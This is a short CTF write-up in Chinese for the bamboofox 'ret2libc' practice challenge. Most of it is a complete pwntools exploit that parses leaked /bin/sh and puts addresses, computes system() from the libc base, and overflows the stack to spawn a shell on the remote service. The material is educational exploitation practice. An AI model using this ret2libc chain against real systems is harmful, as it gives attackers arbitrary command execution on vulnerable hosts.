ret2libc
Description
nc bamboofox.cs.nctu.edu.tw 11002
ret2libc practice
32 位动态链接 ELF，开启了 NX。
程序存在栈溢出，并且直接给出了 /bin/sh 和 puts 的地址，因此可以直接构造 ret2libc 链。
exp如下:
# Solution script for the bamboofox "ret2libc" practice service
# (32-bit dynamically linked ELF, NX enabled). The service prints the runtime
# addresses of "/bin/sh" and puts(); the puts() value locates libc, which in
# turn gives system(), and the stack overflow is used to return into it.
from pwn import *

context.arch = 'i386'
context.os = 'linux'

# For local debugging swap the remote for: io = process('./ret2libc')
io = remote('bamboofox.cs.nctu.edu.tw', 11002)
elf = ELF('./ret2libc')
# NOTE(review): offsets below are only valid if this libc matches the one
# the remote service runs; elf.libc would pick the local system's copy.
libc = ELF('./libc.so.6')


def read_leak(marker):
    """Read output up to *marker* and parse the hex address printed after it."""
    io.recvuntil(marker)
    return int(io.recvline().strip(), 16)


binsh_addr = read_leak('The address of "/bin/sh" is ')
info('binsh_addr: ' + hex(binsh_addr))

puts_addr = read_leak('The address of function "puts" is ')
info('puts_addr: ' + hex(puts_addr))

# Leaked address minus the symbol's offset inside libc gives the mapping base.
libc_base = puts_addr - libc.sym['puts']
info('libc_base: ' + hex(libc_base))
system_addr = libc_base + libc.sym['system']
info('system_addr: ' + hex(system_addr))

# 32 bytes of filler presumably reach the saved return address (verify against
# the binary), followed by an i386 call frame: callee, return address, argument.
payload = b''.join([b'a' * 32, p32(system_addr), p32(0), p32(binsh_addr)])
io.sendline(payload)
io.interactive()